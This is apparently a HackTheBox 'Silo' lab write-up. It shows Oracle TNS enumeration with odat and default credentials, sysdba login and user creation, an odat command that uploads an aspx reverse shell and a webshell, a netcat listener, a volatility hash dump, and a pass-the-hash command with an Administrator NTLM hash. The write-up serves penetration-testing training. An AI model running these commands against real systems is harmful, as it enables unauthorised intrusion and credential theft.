HackTheBox - Silo Writeup

tags: writeup Silo Machine medium OSCP Volatility Oracle TNS Listener

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Port Scanning

Nmap command

nmap -sV -T4 -sS -v -sC -p- -oN Ports 10.10.10.82

# Nmap 7.92 scan initiated Thu May  5 06:28:23 2022 as: nmap -sV -T4 -sS -v -sC -p- -oN Ports 10.10.10.82
Increasing send delay for 10.10.10.82 from 0 to 5 due to 2935 out of 7337 dropped probes since last increase.
Increasing send delay for 10.10.10.82 from 5 to 10 due to 11 out of 19 dropped probes since last increase.
Warning: 10.10.10.82 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.82
Host is up (0.068s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 58s, deviation: 0s, median: 58s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   3.0.2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-05-05T10:48:55
|_  start_date: 2022-05-05T10:23:23

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May  5 06:48:00 2022 -- 1 IP address (1 host up) scanned in 1177.15 seconds

We can see the a IIS server up and some strange Oracle TNS Listener let's search more about it.

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Enumeration

The first thing i looked for was in hacktricks and i founded some info about it, theres a tool callet odat that retrieves info about this port with one command.

To see how to use it i enter the help command and we can see al the modules:

In my case I launched the all option that autoenumerate the port bruteforcing for sids, accounts, passwords and if is vulnerable to some exploits.

odat all -s 10.10.10.82 -p 1521

After a few seconds i retrieved the necessary info to try to use other modules:

Now we know these things:

• SID is XE
• Username = scott
• Password = tiger

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Explotation

TNS Listener Explotation

Looking into the wiki page in the github odat tool I can see we can upload files to the IIS server so i tried the following command to upload a aspx reverse shell.

odat dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "c:\inetpub\wwwroot\\" shell.aspx /tmp/shell.aspx

But i retrieved this error:

We see that we don't have enough privileges to upload it with the account that we obtained from de odat tool so after reading in hacktricks and looking for info I see that we can login as sysdba in the DB using sqlplus client from oracle with the following command:

sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba';

sqlplus scott/tiger@10.10.10.82:1521/XE 'as sysdba';

After login into the db we have to create a user that has sysdba privileges to can upload files with odat without problems.

I looked the syntax for it in this two webpages:

• https://dba.stackexchange.com/questions/40562/creating-an-admin-user-in-oracle
• https://www.oracletutorial.com/oracle-administration/oracle-create-user/

See the following image to see how i created it.

Next to that we have to try to upload a file with the new account created using odat. I have ready an aspx reverse shell for the IIS server so I uploaded in the root directory of the web server.

It is important besides uploading a reverse shell, to upload a webshell to be able to read the file below that has an encoding error and we can only read it properly if we load it from the webshell.

odat dbmsxslprocessor -s 10.10.10.82 -d XE -U pepe -P pepelu --putFile "c:\inetpub\wwwroot\\" shell2.aspx /tmp/shell.aspx

After upload it successfully, start a netcat listener and load the shell in the explorer.

rlwrap nc -nlvp 8888

With this we can look the user flag.

⏫Root Privesc

Inside the User directory we can see the flag and a text file, let's read it.

To read properly the text read it from the webshell.

If we click the link we can access to a dropbox file protected by password, let's use the password in the text:

After write the password we can download this zip file:

Next we unzip it and we see a .dmg file, taking into account that the text file said that it was a memory dump we could use volatility3 to analyse it, but first we have to install it so I leave you this link as a guide for volatility3.

Theres a lot of modules in volatility, but looking into the guide but i found one that we can use to dump the credential hashes, here's the command to use with the file.

vol -f SILO-20180105-221806.dmp windows.hashdump

After That we received the stored hashes and with this, we can try to login with pass the hash.

pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd.exe

After that we are going to be administrators and we can read the root flag.

You can find me on: